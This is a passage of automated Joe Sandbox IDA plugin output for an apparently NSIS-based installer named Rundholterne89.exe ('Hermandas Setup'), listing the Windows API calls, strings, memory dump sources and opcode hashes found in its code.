                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: Char$Next$Prev
                                                                                            • String ID: "C:\Users\user\Desktop\Rundholterne89.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                            • API String ID: 589700163-2912927711
                                                                                            • Opcode ID: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                                                            • Instruction ID: 57e0f34d942670e43035b7c22e392f1a12bb14715b301cf1348a0c798ab9ef07
                                                                                            • Opcode Fuzzy Hash: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                                                            • Instruction Fuzzy Hash: 8B112751809B932AFB3256244C00B7BBFD88F57760F19007BE8D5722C2D67C5D529B6D
                                                                                            APIs
                                                                                            • GetWindowLongA.USER32(?,000000EB), ref: 00403F98
                                                                                            • GetSysColor.USER32(00000000), ref: 00403FB4
                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00403FC0
                                                                                            • SetBkMode.GDI32(?,?), ref: 00403FCC
                                                                                            • GetSysColor.USER32(?), ref: 00403FDF
                                                                                            • SetBkColor.GDI32(?,?), ref: 00403FEF
                                                                                            • DeleteObject.GDI32(?), ref: 00404009
                                                                                            • CreateBrushIndirect.GDI32(?), ref: 00404013
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2320649405-0
                                                                                            • Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                                            • Instruction ID: f3431a0ddd372d44177634c3e6640760e16b4c563197d04d055afd4279a4596b
                                                                                            • Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                                            • Instruction Fuzzy Hash: F4219F71808705ABCB209F78DD48A4BBBF8AF41704B048A2AE996F26E0C734E904CB55
                                                                                            APIs
                                                                                            • lstrlenA.KERNEL32(00429048,00000000,0041C205,774D23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                                            • lstrlenA.KERNEL32(00402FFA,00429048,00000000,0041C205,774D23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                                            • lstrcatA.KERNEL32(00429048,00402FFA,00402FFA,00429048,00000000,0041C205,774D23A0), ref: 00404FA4
                                                                                            • SetWindowTextA.USER32(00429048,00429048), ref: 00404FB6
                                                                                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                                            • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                                            • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                            • String ID:
                                                                                            • API String ID: 2531174081-0
                                                                                            • Opcode ID: 534154c7e412c88fb75b9fbb21228ed2bc61e9f55108b0b726938b2d4222e579
                                                                                            • Instruction ID: 5247e829223e414f07dbea0a4ec6ac131d28d962b221907bbf4360a320382309
                                                                                            • Opcode Fuzzy Hash: 534154c7e412c88fb75b9fbb21228ed2bc61e9f55108b0b726938b2d4222e579
                                                                                            • Instruction Fuzzy Hash: 76218C71D00118BBDF219FA5DC84ADEBFA9EF08354F10807AF904B6291C7798E408FA8
                                                                                            APIs
                                                                                            • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040482E
                                                                                            • GetMessagePos.USER32 ref: 00404836
                                                                                            • ScreenToClient.USER32(?,?), ref: 00404850
                                                                                            • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404862
                                                                                            • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404888
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message$Send$ClientScreen
                                                                                            • String ID: f
                                                                                            • API String ID: 41195575-1993550816
                                                                                            • Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                                            • Instruction ID: 72a6dff9965abeea3fde93c43f55bc8d1d0b984f63b53e8c81f3052648e7bb03
                                                                                            • Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                                            • Instruction Fuzzy Hash: EC019275D00218BADB00DBA5DC41FFEBBBCAF45711F10412BBB10B61C0C7B4A5018BA5
                                                                                            APIs
                                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B9A
                                                                                            • MulDiv.KERNEL32(000D9908,00000064,000D990C), ref: 00402BC5
                                                                                            • wsprintfA.USER32 ref: 00402BD5
                                                                                            • SetWindowTextA.USER32(?,?), ref: 00402BE5
                                                                                            • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF7
                                                                                            Strings
                                                                                            • verifying installer: %d%%, xrefs: 00402BCF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                            • String ID: verifying installer: %d%%
                                                                                            • API String ID: 1451636040-82062127
                                                                                            • Opcode ID: f377c182e300eefdb83bb0ba9c57991093f425550345df3c4c3600326924e25d
                                                                                            • Instruction ID: f77185bba9c57e6aa61c0c8aee9f592e237af7c43fbef78eddb3d4185353df7a
                                                                                            • Opcode Fuzzy Hash: f377c182e300eefdb83bb0ba9c57991093f425550345df3c4c3600326924e25d
                                                                                            • Instruction Fuzzy Hash: D001F471640208BBEF209F60DD09EAE3779EB04744F008039FA16B51D1D7B5A955DB59
                                                                                            APIs
                                                                                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A9B
                                                                                            • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402AE0
                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402B05
                                                                                            • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: Close$DeleteEnumOpen
                                                                                            • String ID:
                                                                                            • API String ID: 1912718029-0
                                                                                            • Opcode ID: 7766ad722bcf743109a83c91df0766a7f4c549130a1e07b93abaa864288c9da4
                                                                                            • Instruction ID: e0b40e6d550d0c6dedecb0be42375ee7245bd63e637183e656586a56a8cfacd8
                                                                                            • Opcode Fuzzy Hash: 7766ad722bcf743109a83c91df0766a7f4c549130a1e07b93abaa864288c9da4
                                                                                            • Instruction Fuzzy Hash: 66116D31A00108FEDF22AF90DE89EAA3B7DEB54349B104436FA01B10E0D774AE51DB69
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?), ref: 00401CE2
                                                                                            • GetClientRect.USER32(00000000,?), ref: 00401CEF
                                                                                            • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
                                                                                            • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                                                            • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                            • String ID:
                                                                                            • API String ID: 1849352358-0
                                                                                            • Opcode ID: df9cc67d31b04cd6e9f5647a99bb7b911e6a77bbf16d980a5e8a288dfb7b3bdc
                                                                                            • Instruction ID: 718a49c372d49eeeb619100b459207f1cde729867d9d835a9e14b5832590348d
                                                                                            • Opcode Fuzzy Hash: df9cc67d31b04cd6e9f5647a99bb7b911e6a77bbf16d980a5e8a288dfb7b3bdc
                                                                                            • Instruction Fuzzy Hash: 74F0E7B2A04114AFEB01EBE4DE88DAFB7BDEB54305B10447AF602F6191C7749D018B79
                                                                                            APIs
                                                                                            • GetDC.USER32(?), ref: 00401D3B
                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
                                                                                            • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D57
                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401D68
                                                                                            • CreateFontIndirectA.GDI32(0040A818), ref: 00401DB3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                            • String ID:
                                                                                            • API String ID: 3808545654-0
                                                                                            • Opcode ID: c2a9d05608db3b551cbe7321e8fd88224b197bc40f94a71f0fff53b7c1922a27
                                                                                            • Instruction ID: ad7d238852a8d87b5aaa3e6a204337ae93e1cce4a0b470fbec170e72a625d374
                                                                                            • Opcode Fuzzy Hash: c2a9d05608db3b551cbe7321e8fd88224b197bc40f94a71f0fff53b7c1922a27
                                                                                            • Instruction Fuzzy Hash: EA01D632944340AFEB0177B0AE4EBAA3FB49759309F108479F201B62E2C6790052CF6F
                                                                                            APIs
                                                                                            • lstrlenA.KERNEL32(00429868,00429868,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404624,000000DF,00000000,00000400,?), ref: 004047A7
                                                                                            • wsprintfA.USER32 ref: 004047AF
                                                                                            • SetDlgItemTextA.USER32(?,00429868), ref: 004047C2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                            • String ID: %u.%u%s%s
                                                                                            • API String ID: 3540041739-3551169577
                                                                                            • Opcode ID: 1472cf9e36570b38fa99e832c46bb30f5d20a58f0764e004e3f2a6e79c89f0d0
                                                                                            • Instruction ID: 053aaa49463ee093dad042f908cd6657d31450f6c5b0c7846562dfb37f065ee1
                                                                                            • Opcode Fuzzy Hash: 1472cf9e36570b38fa99e832c46bb30f5d20a58f0764e004e3f2a6e79c89f0d0
                                                                                            • Instruction Fuzzy Hash: 0E11E473A041283BDB0065A99C45EAF3288DB82374F254237FA25F71D1EA78CC1286A8
                                                                                            APIs
                                                                                            • SetWindowTextA.USER32(00000000,Hermandas Setup), ref: 00403A0C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: TextWindow
                                                                                            • String ID: "C:\Users\user\Desktop\Rundholterne89.exe"$1033$Hermandas Setup
                                                                                            • API String ID: 530164218-3196150966
                                                                                            • Opcode ID: c35f14d8ae607f964b1d366d12cd70842dee39e56cae11f13a59ba4c30930c7f
                                                                                            • Instruction ID: fbf6035dbb292e76ee93bcdc762ea67a79fb5cde0254510f453a1e05a67cff09
                                                                                            • Opcode Fuzzy Hash: c35f14d8ae607f964b1d366d12cd70842dee39e56cae11f13a59ba4c30930c7f
                                                                                            • Instruction Fuzzy Hash: 97110871B046109BC730AF56DC409737B6CEF89319368423FE801A73D1D639AD03CAA9
                                                                                            APIs
                                                                                            • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 004057A7
                                                                                            • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 004057B0
                                                                                            • lstrcatA.KERNEL32(?,00409014), ref: 004057C1
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004057A1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                            • API String ID: 2659869361-2145255484
                                                                                            • Opcode ID: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                                                            • Instruction ID: 31daa9478c60f2ec517fa6cf0afa0cd81b34b06dfe81de980877f4a94ee531a8
                                                                                            • Opcode Fuzzy Hash: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                                                            • Instruction Fuzzy Hash: 8ED0A762505D306BE21226155C09D8B2A08CF12740B044027F100B61E1C63C4D414FFD
                                                                                            APIs
                                                                                            • DestroyWindow.USER32(00000000,00000000,00402DE2,00000001), ref: 00402C15
                                                                                            • GetTickCount.KERNEL32 ref: 00402C33
                                                                                            • CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C50
                                                                                            • ShowWindow.USER32(00000000,00000005), ref: 00402C5E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                            • String ID:
                                                                                            • API String ID: 2102729457-0
                                                                                            • Opcode ID: 42481ae060c013658952b0ba65f2133d3ed78682e8b262a627202bc2b689c50f
                                                                                            • Instruction ID: 1b84634240e2166e3851fbc92cd381e461e1db94d3428fd6ef6110bf0b183a31
                                                                                            • Opcode Fuzzy Hash: 42481ae060c013658952b0ba65f2133d3ed78682e8b262a627202bc2b689c50f
                                                                                            • Instruction Fuzzy Hash: 97F05E30A09220EFD6317B20FE4CD9F7BA4BB04B15B404976F104B11EAC7782882CB9D
                                                                                            APIs
                                                                                              • Part of subcall function 00405D2F: lstrcpynA.KERNEL32(?,?,00000400,004031BD,Hermandas Setup,NSIS Error), ref: 00405D3C
